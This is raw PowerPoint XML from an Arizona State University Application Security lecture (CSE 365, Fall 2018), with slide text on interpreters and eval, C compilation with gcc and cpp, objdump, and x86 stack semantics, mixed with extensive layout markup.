              <a:t>att</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>leave semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Set ESP to EBP, then pop EBP.</a:t>
            </a:r>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164</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6650532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70919A-7999-1344-A77D-8550F76A0C90}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>165</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="706562" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7065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718936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A5C90E-F172-ED4A-9B27-405EC72B29A4}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>166</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="707586" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7075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393255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ATT assembly syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –Wall –m32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>att</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>leave semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Set ESP to EBP, then pop EBP.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C832F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>170</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1722795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121A61-84E2-0240-BA67-5A5A0E89159B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1015810" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10158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65898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0FB2D7-A42A-8D4B-9DED-F972C34B7F5D}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1017858" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10178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29887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0FB2D7-A42A-8D4B-9DED-F972C34B7F5D}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1017858" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10178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58945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135FE7-AEDA-6648-AFAA-5B077E7D38B8}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1018882" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10188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92017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1FD688-6B2C-5049-9211-A6DB3E582AA7}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1053698" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10536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29759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148EDD-1C0A-384D-B172-B3B742C536A2}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1020930" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10209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51170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180802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7"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513187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7"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192767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447800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Table Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="tbl" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1752600"/>
            <a:ext cx="8686800" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="6400800"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr smtClean="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{6533B83B-44E4-484B-85B6-9FCF77BE0DAA}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16665008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447800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1752600"/>
            <a:ext cx="42672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52600"/>
            <a:ext cx="42672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a:xfrm>
            <a:off x="8458200" y="6400800"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr smtClean="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{FEE62F38-8D23-B74E-AB9B-1D546E6113A9}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="44565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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Footer Placeholder 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6373815"/>
            <a:ext cx="3891776"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dirty="0"/>
              <a:t>Adam Doupé, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Information Assurance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2173440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6524017" y="6356352"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D7E63A33-8271-4DD0-9C48-789913D7C115}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1926531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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2814312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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="200506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6"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608991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5"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861552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49"/>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6524017" y="6356352"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2754ED01-E2A0-4C1E-8E21-014B99041579}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8"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9429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a:xfrm>
            <a:off x="6524017" y="6356352"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6373815"/>
            <a:ext cx="36195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44138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186"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId15" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8242300" y="6356353"/>
            <a:ext cx="444500" cy="200025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2988045441"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147484548" r:id="rId1"/>
    <p:sldLayoutId id="2147484549" r:id="rId2"/>
    <p:sldLayoutId id="2147484550" r:id="rId3"/>
    <p:sldLayoutId id="2147484551" r:id="rId4"/>
    <p:sldLayoutId id="2147484552" r:id="rId5"/>
    <p:sldLayoutId id="2147484553" r:id="rId6"/>
    <p:sldLayoutId id="2147484554" r:id="rId7"/>
    <p:sldLayoutId id="2147484555" r:id="rId8"/>
    <p:sldLayoutId id="2147484556" r:id="rId9"/>
    <p:sldLayoutId id="2147484557" r:id="rId10"/>
    <p:sldLayoutId id="2147484558" r:id="rId11"/>
    <p:sldLayoutId id="2147484559" r:id="rId12"/>
    <p:sldLayoutId id="2147484560" r:id="rId1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Application Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3886199"/>
            <a:ext cx="6400800" cy="2059281"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>CSE 365 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– Information Assurance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fall 2018</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adam Doupé</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" noProof="0" dirty="0"/>
              <a:t>Arizona State University</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>adamdoupe.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="813896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Interpretation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The program is passed to an interpreter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The program might be translated into an intermediate representation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python byte-code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each instruction is parsed and executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In most interpreted languages it is possible to generate and execute code dynamically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bash: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt;string&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(&lt;string&gt;)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(&lt;string&gt;)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1153624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100</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0x28</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0x804839a</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142133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212858921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101</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0x28</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0x804839a</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142133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26889474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102</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0x28</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0x804839d</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168651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00840273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103</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0x32</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0x804839d</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168651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28380821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104</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0x32</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19608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40347271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105</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19608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55998019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106</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0x80483a3</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223515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210682521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107</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0x80483a3</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223515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700932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108</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0x80483a3</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223515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27415147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109</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0x80483a3</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223515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319937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311400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Compilation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The preprocessor expands the code to include definitions, expand macros</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GNU/Linux: The C preprocessor is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>cpp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The compiler turns the code into architecture-specific assembly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GNU/Linux: The C compiler is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> -S </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>prog.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>will generate the assembly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>m32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>option to generate 32-bit assembly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1478740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110</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25094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319937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08694616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111</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25094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319937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80820973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112</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25094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319937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53997786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113</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25094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283361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93513063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114</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47040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283361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45532092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115</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47040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283361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2" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2826432" y="84979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0xfd2cc</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1887564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116</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0x80483c2</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498749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283361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2" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2826432" y="84979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0xfd2cc</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166653815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117</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0x80483c2</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498749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283361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2" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2826432" y="84979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0xfd2cc</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202509733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118</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0x80483c5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52526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283361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2" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
